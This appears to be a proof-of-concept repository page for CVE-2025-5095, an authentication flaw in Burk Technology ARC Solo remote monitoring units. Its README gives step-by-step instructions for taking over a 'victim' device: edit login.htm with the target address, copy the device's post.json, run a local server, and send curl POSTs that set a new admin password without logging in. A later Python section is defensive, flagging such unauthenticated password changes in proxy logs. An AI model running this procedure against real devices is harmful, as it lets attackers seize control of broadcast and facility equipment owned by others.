
CVE-2025-5095 PoC — Burk Technology ARC Solo Access Control Error Vulnerability

Associated Vulnerability
Title: Burk Technology ARC Solo Access Control Error Vulnerability (CVE-2025-5095)
Description: Burk Technology ARC Solo is an IP-based remote monitoring and control system from the US company Burk. Burk Technology ARC Solo contains an access control error vulnerability: the password change mechanism does not properly verify authentication, which can lead to device takeover.
Description
Python POC for CVE-2025-5095
Readme
How To Use:

Open login.htm and replace every IP:PORT placeholder with the victim address.

<img width="1134" height="466" alt="image" src="https://github.com/user-attachments/assets/107a5515-1c32-4404-b19c-ca382ff6eeb3" />

Change the `var LoginVersion = "Check On The Victim Site";` line to the version shown on the victim page; to find it, open the victim page and view its source.
**WARNING: THIS CVE ONLY WORKS ON VERSIONS OLDER THAN 1.0.60**

<img width="506" height="112" alt="image" src="https://github.com/user-attachments/assets/9ab72bc9-f7d8-4538-8aac-d52ffcfd422b" />

Download the post.json file from the victim site (http://victimip:port/post.json).
Move it into the script folder, so that you now have three files there.

<img width="629" height="86" alt="image" src="https://github.com/user-attachments/assets/c5fe5bb8-b70f-4d58-9132-1b2c6ddab233" />

Now run the Python file and open 127.0.0.1:8080/login.htm (if port 8080 is already in use, open the script in a text editor and change the port at the end of the file).

<img width="574" height="60" alt="image" src="https://github.com/user-attachments/assets/e5d60db5-16a1-4ea2-b649-5153f00addd7" />

*Ignore the alert when opening the login page*

Open a terminal and run these curl commands; if the response prints "success", it worked.

curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"

curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"

<img width="1014" height="758" alt="image" src="https://github.com/user-attachments/assets/98e696e9-6443-4bd0-aff9-560bde720c04" />

To check if the page changed, send this command:

curl http://localhost:8080/check_password

Now visit the victim site (not the localhost one) and log in with the new password; in this example the password is "newtestpass".
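From the defender's side, the two requests above are the signal to watch for: a POST to /post.json carrying a UserPasswordN or UsersSaveConfig field from a client that never authenticated. The helpers below are an added example, not the PoC's own code; they assume a reverse proxy or WAF in front of the device that logs the POST body and whether the request carried an authenticated session (a field the page does not describe), and the log records are constructed.

```python
"""Triage helpers for CVE-2025-5095 (added example, not the PoC's code).

Assumption (not on the page): a proxy/WAF log that records method, path,
the form body of POSTs and an 'authenticated' flag per request.
"""
from urllib.parse import parse_qs

FIXED_VERSION = (1, 0, 60)  # the README states only versions older than 1.0.60 are affected
SAVE_FIELDS = ("UsersSaveConfig",)  # plus any UserPasswordN field


def parse_version(text):
    """Turn a LoginVersion string such as "1.0.58" into a comparable tuple."""
    return tuple(int(part) for part in text.strip().split("."))


def is_affected_version(text):
    """True when the reported firmware version is older than 1.0.60."""
    return parse_version(text) < FIXED_VERSION


def credential_fields(body):
    """Return the form fields in a POST body that set or save user credentials."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(k for k in fields if k.startswith("UserPassword") or k in SAVE_FIELDS)


def flag_unauthenticated_changes(records):
    """Flag POSTs to /post.json that touch credential fields without a session.

    Each record is a dict with src, method, path, body and authenticated (assumed proxy field).
    """
    alerts = []
    for rec in records:
        if rec["method"] != "POST" or not rec["path"].endswith("/post.json"):
            continue
        hit = credential_fields(rec["body"])
        if hit and not rec["authenticated"]:
            alerts.append((rec["src"], hit))
    return alerts


# Constructed sample records mirroring the two curl requests in the README.
SAMPLE = [
    {"src": "203.0.113.5", "method": "POST", "path": "/post.json",
     "body": "UserPassword0=newtestpass", "authenticated": False},
    {"src": "203.0.113.5", "method": "POST", "path": "/post.json",
     "body": "UsersSaveConfig=true", "authenticated": False},
    {"src": "192.0.2.10", "method": "POST", "path": "/post.json",
     "body": "UserPassword0=rotated", "authenticated": True},  # legitimate admin change
    {"src": "192.0.2.11", "method": "GET", "path": "/post.json", "body": "", "authenticated": False},
]

if __name__ == "__main__":
    for src, fields in flag_unauthenticated_changes(SAMPLE):
        print(f"ALERT {src}: unauthenticated credential change via {fields}")
```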
File Snapshot

[4.0K] /data/pocs/3e026908476ffdc40aad1bba9b15055e8282333e
├── [1.0K] app.py
├── [ 34K] LICENSE
├── [ 10K] login.htm
├── [8.7K] post.json
└── [1.7K] README.md

0 directories, 5 files